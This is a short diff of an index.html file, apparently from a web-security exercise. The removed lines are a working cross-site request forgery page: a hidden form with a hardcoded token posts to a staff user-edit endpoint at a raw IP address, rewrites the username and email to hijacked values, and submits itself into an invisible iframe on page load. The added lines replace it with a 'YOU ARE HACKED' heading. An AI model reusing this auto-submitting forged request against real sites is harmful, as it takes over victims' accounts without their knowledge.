--- a/index.html
+++ b/index.html
@@ -1,17 +1,6 @@
-
-<iframe src="https://giphy.com/embed/de5bARu0SsXiU" width="0" height="0" frameBorder="0" id="gif" name="gif"></iframe>
-
-<form action="https://35.184.88.145/red/public/staff/users/edit.php?id=1" method="post" id="leform" target="gif">
-    <input name="csrf_token" value="1cd5184d609bc5fbadcda1e4ff250479" type="hidden">
-    <input name="first_name" value="CSRF first" type="hidden">
-    <input name="last_name" value="CSRF last" type="hidden">
-    <input name="username" value="YouHaveBeenHACKED" type="hidden">
-    <input name="email" value="hijacked@email.com" type="hidden">
-    <input name="previous_password" value="" type="hidden">
-    <input name="password" value="" type="hidden">
-    <input name="confirm_password" value="" type="hidden">
-  </form>
-
-<script>document.getElementById("leform").submit();</script>
-
-<iframe src="https://giphy.com/embed/de5bARu0SsXiU" width="480" height="253" frameBorder="0" class="giphy-embed" allowFullScreen id="gif" name="gif"></iframe>
+<h1>
+  YOU ARE HACKED
+</h1>
+<h2>
+  Get Some Help
+</h2>
